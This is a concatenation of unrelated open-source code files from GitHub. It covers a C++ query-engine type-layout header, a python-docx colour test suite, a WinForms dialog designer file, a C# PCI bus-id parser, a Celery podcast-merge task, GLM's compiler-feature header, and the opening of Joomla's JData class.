    modified_target_type.set_notnull(agg_arg.get_notnull());
    return modified_target_type;
  }
}

// Inverse of get_compact_type: writes the new type into the aggregate argument
// slot (except for argument-less COUNT) or into the target's SQL type.
inline void set_compact_type(TargetInfo& target, const SQLTypeInfo& new_type) {
  if (target.is_agg) {
    const auto agg_type = target.agg_kind;
    auto& agg_arg = target.agg_arg_type;
    if (agg_type != kCOUNT || agg_arg.get_type() != kNULLT) {
      agg_arg = new_type;
      return;
    }
  }
  target.sql_type = new_type;
}
// Returns the in-memory NULL sentinel for an integral-backed SQL type.
// Dictionary-encoded strings (asserted to be 4-byte) are treated as kINT.
inline int64_t inline_int_null_val(const SQLTypeInfo& ti) {
  auto type = ti.get_type();
  if (ti.is_string()) {
    CHECK_EQ(kENCODING_DICT, ti.get_compression());
    CHECK_EQ(4, ti.get_logical_size());
    type = kINT;
  }
  switch (type) {
    case kBOOLEAN:
    case kTINYINT:
      return inline_int_null_value<int8_t>();
    case kSMALLINT:
      return inline_int_null_value<int16_t>();
    case kINT:
      return inline_int_null_value<int32_t>();
    case kBIGINT:
    case kTIMESTAMP:
    case kTIME:
    case kDATE:
    case kINTERVAL_DAY_TIME:
    case kINTERVAL_YEAR_MONTH:
    case kDECIMAL:
    case kNUMERIC:
      return inline_int_null_value<int64_t>();
    default:
      abort();
  }
}
// Returns the NULL sentinel for a column under its *storage* encoding.
// kENCODING_NONE falls back to the plain in-memory sentinel; date-in-days and
// dictionary encodings pick the sentinel matching their storage width; for
// kENCODING_FIXED the sentinel is the most negative comp_param-bit value.
inline int64_t inline_fixed_encoding_null_val(const SQLTypeInfo& ti) {
  if (ti.get_compression() == kENCODING_NONE) {
    return inline_int_null_val(ti);
  }
  if (ti.get_compression() == kENCODING_DATE_IN_DAYS) {
    // comp_param 0 means the default (32-bit) days encoding.
    switch (ti.get_comp_param()) {
      case 0:
      case 32:
        return inline_int_null_value<int32_t>();
      case 16:
        return inline_int_null_value<int16_t>();
      default:
#ifndef __CUDACC__
        CHECK(false) << "Unknown encoding width for date in days: "
                     << ti.get_comp_param();
#else
        CHECK(false);
#endif
    }
  }
  if (ti.get_compression() == kENCODING_DICT) {
    CHECK(ti.is_string());
    // Note: 1- and 2-byte dictionary ids use the *unsigned* sentinels.
    switch (ti.get_size()) {
      case 1:
        return inline_int_null_value<uint8_t>();
      case 2:
        return inline_int_null_value<uint16_t>();
      case 4:
        return inline_int_null_value<int32_t>();
      default:
#ifndef __CUDACC__
        CHECK(false) << "Unknown size for dictionary encoded type: " << ti.get_size();
#else
        CHECK(false);
#endif
    }
  }
  CHECK_EQ(kENCODING_FIXED, ti.get_compression());
  CHECK(ti.is_integer() || ti.is_time() || ti.is_decimal());
  CHECK_EQ(0, ti.get_comp_param() % 8);
  // Most negative value representable in comp_param bits marks NULL.
  return -(1L << (ti.get_comp_param() - 1));
}
// Returns the floating-point NULL sentinel (as double) for kFLOAT/kDOUBLE.
inline double inline_fp_null_val(const SQLTypeInfo& ti) {
  CHECK(ti.is_fp());
  if (ti.get_type() == kFLOAT) {
    return inline_fp_null_value<float>();
  }
  if (ti.get_type() == kDOUBLE) {
    return inline_fp_null_value<double>();
  }
  abort();
}
// Returns 10^exp as an unsigned 64-bit integer (caller keeps exp <= 19,
// the largest power of ten that fits in uint64_t).
inline uint64_t exp_to_scale(const unsigned exp) {
  uint64_t scale = 1;
  for (unsigned i = exp; i != 0; --i) {
    scale *= 10;
  }
  return scale;
}
// Returns the bit width used to represent a value of the given type.
// Decimals are computed as 64-bit integers; strings are 32-bit dictionary
// ids; arrays and columns use their element storage size. LOG(FATAL) on
// untyped or unhandled input.
inline size_t get_bit_width(const SQLTypeInfo& ti) {
  const auto int_type = ti.is_decimal() ? kBIGINT : ti.get_type();
  switch (int_type) {
    case kNULLT:
      LOG(FATAL) << "Untyped NULL values are not supported. Please CAST any NULL "
                    "constants to a type.";
    case kBOOLEAN:
      return 8;
    case kTINYINT:
      return 8;
    case kSMALLINT:
      return 16;
    case kINT:
      return 32;
    case kBIGINT:
      return 64;
    case kFLOAT:
      return 32;
    case kDOUBLE:
      return 64;
    case kTIME:
    case kTIMESTAMP:
    case kDATE:
    case kINTERVAL_DAY_TIME:
    case kINTERVAL_YEAR_MONTH:
      // Width follows the platform's time_t representation.
      return sizeof(time_t) * 8;
    case kTEXT:
    case kVARCHAR:
    case kCHAR:
      return 32;
    case kARRAY:
      if (ti.get_size() == -1) {
        throw std::runtime_error("Projecting on unsized array column not supported.");
      }
      return ti.get_size() * 8;
    case kPOINT:
    case kLINESTRING:
    case kPOLYGON:
    case kMULTIPOLYGON:
      return 32;
    case kCOLUMN:
      return ti.get_elem_type().get_size() * 8;
    default:
      LOG(FATAL) << "Unhandled int_type: " << int_type;
      return {};
  }
}
// True for dictionary-encoded values stored narrower than their logical size
// (the compact forms use unsigned storage -- see the uint8_t/uint16_t
// sentinels in inline_fixed_encoding_null_val's dictionary branch).
inline bool is_unsigned_type(const SQLTypeInfo& ti) {
  return ti.get_compression() == kENCODING_DICT && ti.get_size() < ti.get_logical_size();
}
#endif // QUERYENGINE_SQLTYPESLAYOUT_H
| {
"pile_set_name": "Github"
} |
# encoding: utf-8
"""
Test suite for docx.dml.color module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from docx.enum.dml import MSO_COLOR_TYPE, MSO_THEME_COLOR
from docx.dml.color import ColorFormat
from docx.shared import RGBColor
from ..unitutil.cxml import element, xml
import pytest
class DescribeColorFormat(object):
    """Unit tests for ColorFormat: `type`, `rgb` and `theme_color` properties.

    Each fixture is parametrized with a cxml run element, builds a
    ColorFormat around it, and supplies the expected value (for getters)
    or the expected serialized XML (for setters).
    """

    def it_knows_its_color_type(self, type_fixture):
        color_format, expected_value = type_fixture
        assert color_format.type == expected_value

    def it_knows_its_RGB_value(self, rgb_get_fixture):
        color_format, expected_value = rgb_get_fixture
        assert color_format.rgb == expected_value

    def it_can_change_its_RGB_value(self, rgb_set_fixture):
        color_format, new_value, expected_xml = rgb_set_fixture
        color_format.rgb = new_value
        assert color_format._element.xml == expected_xml

    def it_knows_its_theme_color(self, theme_color_get_fixture):
        color_format, expected_value = theme_color_get_fixture
        assert color_format.theme_color == expected_value

    def it_can_change_its_theme_color(self, theme_color_set_fixture):
        color_format, new_value, expected_xml = theme_color_set_fixture
        color_format.theme_color = new_value
        assert color_format._element.xml == expected_xml

    # fixtures ---------------------------------------------

    # params: (run cxml, expected rgb hex string or None)
    @pytest.fixture(params=[
        ('w:r', None),
        ('w:r/w:rPr', None),
        ('w:r/w:rPr/w:color{w:val=auto}', None),
        ('w:r/w:rPr/w:color{w:val=4224FF}', '4224ff'),
        ('w:r/w:rPr/w:color{w:val=auto,w:themeColor=accent1}', None),
        ('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=accent1}', 'f00ba9'),
    ])
    def rgb_get_fixture(self, request):
        r_cxml, rgb = request.param
        color_format = ColorFormat(element(r_cxml))
        expected_value = None if rgb is None else RGBColor.from_string(rgb)
        return color_format, expected_value

    # params: (run cxml, RGBColor (or None) to assign, expected cxml after)
    @pytest.fixture(params=[
        ('w:r', RGBColor(10, 20, 30), 'w:r/w:rPr/w:color{w:val=0A141E}'),
        ('w:r/w:rPr', RGBColor(1, 2, 3), 'w:r/w:rPr/w:color{w:val=010203}'),
        ('w:r/w:rPr/w:color{w:val=123abc}', RGBColor(42, 24, 99),
         'w:r/w:rPr/w:color{w:val=2A1863}'),
        ('w:r/w:rPr/w:color{w:val=auto}', RGBColor(16, 17, 18),
         'w:r/w:rPr/w:color{w:val=101112}'),
        ('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}',
         RGBColor(24, 42, 99), 'w:r/w:rPr/w:color{w:val=182A63}'),
        ('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}',
         None, 'w:r/w:rPr'),
        ('w:r', None, 'w:r'),
    ])
    def rgb_set_fixture(self, request):
        r_cxml, new_value, expected_cxml = request.param
        color_format = ColorFormat(element(r_cxml))
        expected_xml = xml(expected_cxml)
        return color_format, new_value, expected_xml

    # params: (run cxml, expected MSO_THEME_COLOR member name or None)
    @pytest.fixture(params=[
        ('w:r', None),
        ('w:r/w:rPr', None),
        ('w:r/w:rPr/w:color{w:val=auto}', None),
        ('w:r/w:rPr/w:color{w:val=4224FF}', None),
        ('w:r/w:rPr/w:color{w:themeColor=accent1}', 'ACCENT_1'),
        ('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=dark1}', 'DARK_1'),
    ])
    def theme_color_get_fixture(self, request):
        r_cxml, value = request.param
        color_format = ColorFormat(element(r_cxml))
        expected_value = (
            None if value is None else getattr(MSO_THEME_COLOR, value)
        )
        return color_format, expected_value

    # params: (run cxml, MSO_THEME_COLOR member name (or None) to assign,
    #          expected cxml after)
    @pytest.fixture(params=[
        ('w:r', 'ACCENT_1',
         'w:r/w:rPr/w:color{w:val=000000,w:themeColor=accent1}'),
        ('w:r/w:rPr', 'ACCENT_2',
         'w:r/w:rPr/w:color{w:val=000000,w:themeColor=accent2}'),
        ('w:r/w:rPr/w:color{w:val=101112}', 'ACCENT_3',
         'w:r/w:rPr/w:color{w:val=101112,w:themeColor=accent3}'),
        ('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}', 'LIGHT_2',
         'w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=light2}'),
        ('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}', None,
         'w:r/w:rPr'),
        ('w:r', None, 'w:r'),
    ])
    def theme_color_set_fixture(self, request):
        r_cxml, member, expected_cxml = request.param
        color_format = ColorFormat(element(r_cxml))
        new_value = (
            None if member is None else getattr(MSO_THEME_COLOR, member)
        )
        expected_xml = xml(expected_cxml)
        return color_format, new_value, expected_xml

    # params: (run cxml, expected MSO_COLOR_TYPE member or None)
    @pytest.fixture(params=[
        ('w:r', None),
        ('w:r/w:rPr', None),
        ('w:r/w:rPr/w:color{w:val=auto}', MSO_COLOR_TYPE.AUTO),
        ('w:r/w:rPr/w:color{w:val=4224FF}', MSO_COLOR_TYPE.RGB),
        ('w:r/w:rPr/w:color{w:themeColor=dark1}', MSO_COLOR_TYPE.THEME),
        ('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=accent1}',
         MSO_COLOR_TYPE.THEME),
    ])
    def type_fixture(self, request):
        r_cxml, expected_value = request.param
        color_format = ColorFormat(element(r_cxml))
        return color_format, expected_value
| {
"pile_set_name": "Github"
} |
namespace Kuriimu
{
    /// <summary>
    /// Designer half of the Name dialog: a single text box with OK/Cancel.
    /// </summary>
    partial class Name
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows Form Designer generated code

        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.lblName = new System.Windows.Forms.Label();
            this.txtName = new System.Windows.Forms.TextBox();
            this.btnOK = new System.Windows.Forms.Button();
            this.btnCancel = new System.Windows.Forms.Button();
            this.SuspendLayout();
            //
            // lblName
            //
            this.lblName.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F);
            this.lblName.Location = new System.Drawing.Point(8, 10);
            this.lblName.Name = "lblName";
            this.lblName.Size = new System.Drawing.Size(90, 22);
            this.lblName.TabIndex = 0;
            this.lblName.Text = "Name:";
            this.lblName.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
            //
            // txtName
            //
            this.txtName.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
            | System.Windows.Forms.AnchorStyles.Right)));
            this.txtName.Location = new System.Drawing.Point(104, 12);
            this.txtName.Name = "txtName";
            this.txtName.Size = new System.Drawing.Size(221, 20);
            this.txtName.TabIndex = 1;
            //
            // btnOK
            //
            this.btnOK.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
            this.btnOK.Location = new System.Drawing.Point(234, 43);
            this.btnOK.Name = "btnOK";
            this.btnOK.Size = new System.Drawing.Size(75, 23);
            this.btnOK.TabIndex = 2;
            this.btnOK.Text = "OK";
            this.btnOK.UseVisualStyleBackColor = true;
            this.btnOK.Click += new System.EventHandler(this.btnOK_Click);
            //
            // btnCancel
            //
            this.btnCancel.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
            this.btnCancel.Location = new System.Drawing.Point(315, 43);
            this.btnCancel.Name = "btnCancel";
            this.btnCancel.Size = new System.Drawing.Size(75, 23);
            this.btnCancel.TabIndex = 3;
            this.btnCancel.Text = "Cancel";
            this.btnCancel.UseVisualStyleBackColor = true;
            this.btnCancel.Click += new System.EventHandler(this.btnCancel_Click);
            //
            // Name
            //
            this.AcceptButton = this.btnOK;
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.CancelButton = this.btnCancel;
            this.ClientSize = new System.Drawing.Size(396, 73);
            this.Controls.Add(this.btnCancel);
            this.Controls.Add(this.btnOK);
            this.Controls.Add(this.txtName);
            this.Controls.Add(this.lblName);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
            this.MaximizeBox = false;
            this.MinimizeBox = false;
            this.Name = "Name";
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
            this.Text = "Name";
            this.Load += new System.EventHandler(this.Name_Load);
            this.ResumeLayout(false);
            this.PerformLayout();
        }

        #endregion

        // Designer-managed UI controls.
        private System.Windows.Forms.Label lblName;
        private System.Windows.Forms.TextBox txtName;
        private System.Windows.Forms.Button btnOK;
        private System.Windows.Forms.Button btnCancel;
    }
}
"pile_set_name": "Github"
} |
using System;
using System.Linq;

namespace NHM.DeviceDetection.WMI
{
    /// <summary>
    /// WMI device-bus relation record; exposes the PCI bus id parsed out of
    /// the Antecedent device path.
    /// </summary>
    internal class DeviceBusData
    {
        public string Antecedent { get; set; }
        public string Dependent { get; set; }

        /// <summary>
        /// Extracts the PCI bus id from <see cref="Antecedent"/>.
        /// Returns -1 when the path cannot be parsed.
        /// </summary>
        public int GetPCIBusID()
        {
            try
            {
                var pciSection = Antecedent.Substring(Antecedent.IndexOf("PCI"));
                foreach (var segment in pciSection.Split('\\'))
                {
                    if (!segment.Contains("PCI_BUS")) continue;
                    var candidate = segment.Replace("PCI_BUS", "").Trim('\\', '_', '"');
                    if (int.TryParse(candidate, out var pciBusID))
                    {
                        return pciBusID;
                    }
                    break; // only the first PCI_BUS segment is considered
                }
            }
            catch (Exception)
            {
                // best effort: fall through to the "unknown" sentinel below
            }
            return -1;
        }
    }
}
| {
"pile_set_name": "Github"
} |
from collections import Counter
from django_db_geventpool.utils import close_connection
from mygpo.podcasts.models import Podcast
from mygpo.celery import celery
from mygpo.maintenance.merge import PodcastMerger
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
@celery.task
@close_connection
def merge_podcasts(podcast_ids, num_groups):
    """Celery task that merges the given podcasts into one.

    Args:
        podcast_ids: ids of the Podcast rows to merge.
        num_groups: forwarded to PodcastMerger; semantics defined there.

    Returns:
        Tuple of (actions Counter recording merge operations, merged podcast).
    """
    logger.info('merging podcast ids %s', podcast_ids)
    podcasts = list(Podcast.objects.filter(id__in=podcast_ids))
    logger.info('merging podcasts %s', podcasts)
    actions = Counter()
    pm = PodcastMerger(podcasts, actions, num_groups)
    podcast = pm.merge()
    logger.info('merging result: %s', actions)
    return actions, podcast
| {
"pile_set_name": "Github"
} |
/// @ref core
/// @file glm/detail/_features.hpp
#pragma once
// #define GLM_CXX98_EXCEPTIONS
// #define GLM_CXX98_RTTI
// #define GLM_CXX11_RVALUE_REFERENCES
// Rvalue references - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n2118.html
// GLM_CXX11_TRAILING_RETURN
// Rvalue references for *this - GCC not supported
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2439.htm
// GLM_CXX11_NONSTATIC_MEMBER_INIT
// Initialization of class objects by rvalues - GCC any
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1610.html
// GLM_CXX11_NONSTATIC_MEMBER_INIT
// Non-static data member initializers - GCC 4.7
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2008/n2756.htm
// #define GLM_CXX11_VARIADIC_TEMPLATE
// Variadic templates - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2242.pdf
//
// Extending variadic template template parameters - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2555.pdf
// #define GLM_CXX11_GENERALIZED_INITIALIZERS
// Initializer lists - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2672.htm
// #define GLM_CXX11_STATIC_ASSERT
// Static assertions - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1720.html
// #define GLM_CXX11_AUTO_TYPE
// auto-typed variables - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1984.pdf
// #define GLM_CXX11_AUTO_TYPE
// Multi-declarator auto - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1737.pdf
// #define GLM_CXX11_AUTO_TYPE
// Removal of auto as a storage-class specifier - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2546.htm
// #define GLM_CXX11_AUTO_TYPE
// New function declarator syntax - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2541.htm
// #define GLM_CXX11_LAMBDAS
// New wording for C++0x lambdas - GCC 4.5
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2927.pdf
// #define GLM_CXX11_DECLTYPE
// Declared type of an expression - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2343.pdf
//
// Right angle brackets - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1757.html
//
// Default template arguments for function templates DR226 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_defects.html#226
//
// Solving the SFINAE problem for expressions DR339 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2634.html
// #define GLM_CXX11_ALIAS_TEMPLATE
// Template aliases N2258 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2258.pdf
//
// Extern templates N1987 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1987.htm
// #define GLM_CXX11_NULLPTR
// Null pointer constant N2431 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2431.pdf
// #define GLM_CXX11_STRONG_ENUMS
// Strongly-typed enums N2347 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2347.pdf
//
// Forward declarations for enums N2764 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2764.pdf
//
// Generalized attributes N2761 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2761.pdf
//
// Generalized constant expressions N2235 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2235.pdf
//
// Alignment support N2341 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2341.pdf
// #define GLM_CXX11_DELEGATING_CONSTRUCTORS
// Delegating constructors N1986 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1986.pdf
//
// Inheriting constructors N2540 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2540.htm
// #define GLM_CXX11_EXPLICIT_CONVERSIONS
// Explicit conversion operators N2437 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2437.pdf
//
// New character types N2249 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2249.html
//
// Unicode string literals N2442 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2442.htm
//
// Raw string literals N2442 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2442.htm
//
// Universal character name literals N2170 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2170.html
// #define GLM_CXX11_USER_LITERALS
// User-defined literals N2765 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2765.pdf
//
// Standard Layout Types N2342 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2342.htm
// #define GLM_CXX11_DEFAULTED_FUNCTIONS
// #define GLM_CXX11_DELETED_FUNCTIONS
// Defaulted and deleted functions N2346 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2346.htm
//
// Extended friend declarations N1791 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1791.pdf
//
// Extending sizeof N2253 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2253.html
// #define GLM_CXX11_INLINE_NAMESPACES
// Inline namespaces N2535 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2535.htm
// #define GLM_CXX11_UNRESTRICTED_UNIONS
// Unrestricted unions N2544 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2544.pdf
// #define GLM_CXX11_LOCAL_TYPE_TEMPLATE_ARGS
// Local and unnamed types as template arguments N2657 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2657.htm
// #define GLM_CXX11_RANGE_FOR
// Range-based for N2930 GCC 4.6
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2930.html
// #define GLM_CXX11_OVERRIDE_CONTROL
// Explicit virtual overrides N2928 N3206 N3272 GCC 4.7
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2928.htm
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3206.htm
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2011/n3272.htm
//
// Minimal support for garbage collection and reachability-based leak detection N2670 No
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2670.htm
// #define GLM_CXX11_NOEXCEPT
// Allowing move constructors to throw [noexcept] N3050 GCC 4.6 (core language only)
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3050.html
//
// Defining move special member functions N3053 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3053.html
//
// Sequence points N2239 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2239.html
//
// Atomic operations N2427 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2427.html
//
// Strong Compare and Exchange N2748 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2748.html
//
// Bidirectional Fences N2752 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2752.htm
//
// Memory model N2429 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2429.htm
//
// Data-dependency ordering: atomics and memory model N2664 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2664.htm
//
// Propagating exceptions N2179 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2179.html
//
// Abandoning a process and at_quick_exit N2440 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2440.htm
//
// Allow atomics use in signal handlers N2547 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2547.htm
//
// Thread-local storage N2659 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2659.htm
//
// Dynamic initialization and destruction with concurrency N2660 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2660.htm
//
// __func__ predefined identifier N2340 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2340.htm
//
// C99 preprocessor N1653 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1653.htm
//
// long long N1811 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1811.pdf
//
// Extended integral types N1988 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1988.pdf
#if(GLM_COMPILER & GLM_COMPILER_GCC)
# define GLM_CXX11_STATIC_ASSERT
#elif(GLM_COMPILER & GLM_COMPILER_CLANG)
# if(__has_feature(cxx_exceptions))
# define GLM_CXX98_EXCEPTIONS
# endif
# if(__has_feature(cxx_rtti))
# define GLM_CXX98_RTTI
# endif
# if(__has_feature(cxx_access_control_sfinae))
# define GLM_CXX11_ACCESS_CONTROL_SFINAE
# endif
# if(__has_feature(cxx_alias_templates))
# define GLM_CXX11_ALIAS_TEMPLATE
# endif
# if(__has_feature(cxx_alignas))
# define GLM_CXX11_ALIGNAS
# endif
# if(__has_feature(cxx_attributes))
# define GLM_CXX11_ATTRIBUTES
# endif
# if(__has_feature(cxx_constexpr))
# define GLM_CXX11_CONSTEXPR
# endif
# if(__has_feature(cxx_decltype))
# define GLM_CXX11_DECLTYPE
# endif
# if(__has_feature(cxx_default_function_template_args))
# define GLM_CXX11_DEFAULT_FUNCTION_TEMPLATE_ARGS
# endif
# if(__has_feature(cxx_defaulted_functions))
# define GLM_CXX11_DEFAULTED_FUNCTIONS
# endif
# if(__has_feature(cxx_delegating_constructors))
# define GLM_CXX11_DELEGATING_CONSTRUCTORS
# endif
# if(__has_feature(cxx_deleted_functions))
# define GLM_CXX11_DELETED_FUNCTIONS
# endif
# if(__has_feature(cxx_explicit_conversions))
# define GLM_CXX11_EXPLICIT_CONVERSIONS
# endif
# if(__has_feature(cxx_generalized_initializers))
# define GLM_CXX11_GENERALIZED_INITIALIZERS
# endif
# if(__has_feature(cxx_implicit_moves))
# define GLM_CXX11_IMPLICIT_MOVES
# endif
# if(__has_feature(cxx_inheriting_constructors))
# define GLM_CXX11_INHERITING_CONSTRUCTORS
# endif
# if(__has_feature(cxx_inline_namespaces))
# define GLM_CXX11_INLINE_NAMESPACES
# endif
# if(__has_feature(cxx_lambdas))
# define GLM_CXX11_LAMBDAS
# endif
# if(__has_feature(cxx_local_type_template_args))
# define GLM_CXX11_LOCAL_TYPE_TEMPLATE_ARGS
# endif
# if(__has_feature(cxx_noexcept))
# define GLM_CXX11_NOEXCEPT
# endif
# if(__has_feature(cxx_nonstatic_member_init))
# define GLM_CXX11_NONSTATIC_MEMBER_INIT
# endif
# if(__has_feature(cxx_nullptr))
# define GLM_CXX11_NULLPTR
# endif
# if(__has_feature(cxx_override_control))
# define GLM_CXX11_OVERRIDE_CONTROL
# endif
# if(__has_feature(cxx_reference_qualified_functions))
# define GLM_CXX11_REFERENCE_QUALIFIED_FUNCTIONS
# endif
# if(__has_feature(cxx_range_for))
# define GLM_CXX11_RANGE_FOR
# endif
# if(__has_feature(cxx_raw_string_literals))
# define GLM_CXX11_RAW_STRING_LITERALS
# endif
# if(__has_feature(cxx_rvalue_references))
# define GLM_CXX11_RVALUE_REFERENCES
# endif
# if(__has_feature(cxx_static_assert))
# define GLM_CXX11_STATIC_ASSERT
# endif
# if(__has_feature(cxx_auto_type))
# define GLM_CXX11_AUTO_TYPE
# endif
# if(__has_feature(cxx_strong_enums))
# define GLM_CXX11_STRONG_ENUMS
# endif
# if(__has_feature(cxx_trailing_return))
# define GLM_CXX11_TRAILING_RETURN
# endif
# if(__has_feature(cxx_unicode_literals))
# define GLM_CXX11_UNICODE_LITERALS
# endif
# if(__has_feature(cxx_unrestricted_unions))
# define GLM_CXX11_UNRESTRICTED_UNIONS
# endif
# if(__has_feature(cxx_user_literals))
# define GLM_CXX11_USER_LITERALS
# endif
# if(__has_feature(cxx_variadic_templates))
# define GLM_CXX11_VARIADIC_TEMPLATES
# endif
#endif//(GLM_COMPILER & GLM_COMPILER_CLANG)
| {
"pile_set_name": "Github"
} |
cairo-gobject
gtk4
| {
"pile_set_name": "Github"
} |
<?php
/**
* @package Joomla.Platform
* @subpackage Data
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
defined('JPATH_PLATFORM') or die;
use Joomla\Registry\Registry;
/**
* JData is a class that is used to store data but allowing you to access the data
* by mimicking the way PHP handles class properties.
*
* @since 12.3
*/
class JData implements JDataDumpable, IteratorAggregate, JsonSerializable, Countable
{
	/**
	 * The data properties, keyed by property name. All dynamic property
	 * access (__get/__set/__isset/__unset) is backed by this array.
	 *
	 * @var    array
	 * @since  12.3
	 */
	private $_properties = array();
	/**
	 * The class constructor.
	 *
	 * @param   mixed  $properties  Either an associative array or another object
	 *                              by which to set the initial properties of the new object.
	 *
	 * @since   12.3
	 * @throws  InvalidArgumentException
	 */
	public function __construct($properties = array())
	{
		// Check the properties input.
		if (!empty($properties))
		{
			// Bind the properties.
			$this->bind($properties);
		}
	}
	/**
	 * The magic get method is used to get a data property.
	 *
	 * This method is a public proxy for the protected getProperty method.
